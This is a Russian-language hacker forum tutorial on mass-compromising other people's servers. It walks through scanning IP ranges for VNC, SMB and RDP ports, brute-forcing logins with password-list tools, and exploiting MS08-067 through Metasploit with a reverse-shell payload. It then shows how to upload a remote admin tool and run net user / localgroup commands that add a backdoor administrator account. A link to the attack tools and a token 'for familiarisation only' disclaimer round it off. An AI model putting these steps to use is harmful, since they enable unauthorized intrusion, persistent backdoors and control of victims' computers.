Доброго времени суток!
И так преступим, дедик он же dedicated server это выделенный сервер(подробнее смотрим на http://ru.wikipedia.org). Рассматривать мы будем брут. Следовательно мы будем искать открытые порты 445,139,3389,5900. На машинах с этими открытыми портами можно получить доступ к удаленному рабочему столу.
Начнем пожалуй с порта 5900 он же VNC. Цель для взлома как и все последующие мы будем искать с помощью сканера Angry IP scanner. Его интерфейс интуитивно понятен (вводим начальный и конечный IP для сканирования, и нажав на стрелочку возле кнопки Start выбираем нужный порт(нажимаем на кнопку рядом с Scan Ports и вводим порт)). Далее нажимаем старт и ждем когда сканер найдет и выдаст нам IP потенциальных жертв. Для удобства в настройках можно указать, чтобы отображались только IP которые онлайн и у них открыт нужный нам порт. Далее берем программу services.exe неизвестного мне автора. С помощью неё мы будем пытаться взломать дедики в каталоге с программой есть такие файлы как:
bad.txt - деды к которым пасс не подошел
good.txt - деды к которым пасс подошел
list.txt - ip дедиков которые мы пытаемся взломать
pass.txt - пассворд лист
option.ini - файл с настройками программы
GENERAL]
UIN=icq uin бота
PASS=пароль от номера бота
PassFile=pass.txt - файл с пассами.
UinSend= icq uin на который автоматом высылать гуды.
ListFile=list.txt - файл с ip адресами.
В самой программе нужно нажать только на кнопочку Start. Ну вобщем-то все, далее сами разберетесь.
Взлом дедиков с открытым 139,3389 портом аналогичен. Только софт другой. В качестве брута мы будем использовать Ntscan. В нем практически все также.
NT_user.dic - файл с логинами для брута.
NT_pass.dic - файл с паролями для брута.
host.txt - файл с IP дедиков для брута (надо создать вручную и выбрать при указании параметров брута)
В самой программе указываем нужный нам диапазон IP (если предварительно не отобрали дедики для брута), порт,количество потоков, тайм аут...Ну и вроде как все, нажимаем Start и радуемся...
И так теперь взлом компьютеров с открытым 445 портом. Находим мы их как и все остальные с помощью сканера портов. Использовать мы будем уязвимость MS08-067_netapi присутствующую Sp SP2SP3 Pro. с помощью Metasploit 3.2.
Заходим Metasploit 3.2>GUI>Exploits>Windows>SMB>MS08-067_netapi (подробно о использовании Metasploit можно почитать в статьях -=Lebed=-), Payloads =generic/shell_reverse_tcp
Мы получаем консоль жертвы, с помощью FTP закачиваем настроенный RAdmin и потом через консоль радмина
cmd
net user user pass /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
exit
создаем нового пользователя...
Файлы к архиву: http://www.webfile.ws/d/7875
Пароль:hackzone.ru
________________
ps
Инфа для редких новичков!
Все выше написанно с использованием метериалов AllenZ,stopxaker,Realix...Честь им и хвала!
зы2
все написанно только в целях ознакомления и бла-бла-бла...